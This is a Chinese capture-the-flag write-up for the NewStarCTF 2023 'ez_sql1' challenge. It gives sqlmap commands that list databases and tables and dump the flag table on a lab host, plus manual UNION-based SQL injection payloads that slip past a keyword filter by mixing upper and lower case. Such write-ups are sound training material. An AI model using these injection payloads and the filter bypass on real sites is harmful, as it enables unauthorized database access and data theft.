目录

NewStarCTF-2023-公开赛道ez_sql1-sqlmap使用大小写绕过

[NewStarCTF 2023 公开赛道]ez_sql1 【sqlmap使用/大小写绕过】

题目:

https://i-blog.csdnimg.cn/direct/5acbcf36dec34951a9bfc74b55eac088.png

发现id处可以sql注入:

虽然输入id=1’;show databases;#没什么回显,但是知道这里是字符型注入了

这次利用sqlmap注入

--dbs:列出所有数据库名字
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --dbs

https://i-blog.csdnimg.cn/direct/344dabaa5b7f4ecaa4ba0e1ad500024f.png

--current-db:当前数据库
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --current-db

https://i-blog.csdnimg.cn/direct/5f1d75cb5c7447b6a059bb13444e0550.png

显示表名
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' --tables

https://i-blog.csdnimg.cn/direct/7425891524cc449eaf7ea07ed1106fb1.png

--dump:显示文段内容
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' -T 'here_is_flag' --dump

https://i-blog.csdnimg.cn/direct/b8507c7ad9694592938991d0d534a69a.png

其他手动SQL注入方法

利用大小写绕过

/?id=1' Order by 5 --+
/?id=1' Union SELect 1,version(),user(),database(),5  --+

https://i-blog.csdnimg.cn/direct/15dd318fa44a487698c3c93cdb567453.png

?id=' uNion Select 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA= 'ctf'--+
?id=0' uNion Select 1,2,3,4,flag FROM ctf.here_is_flag--+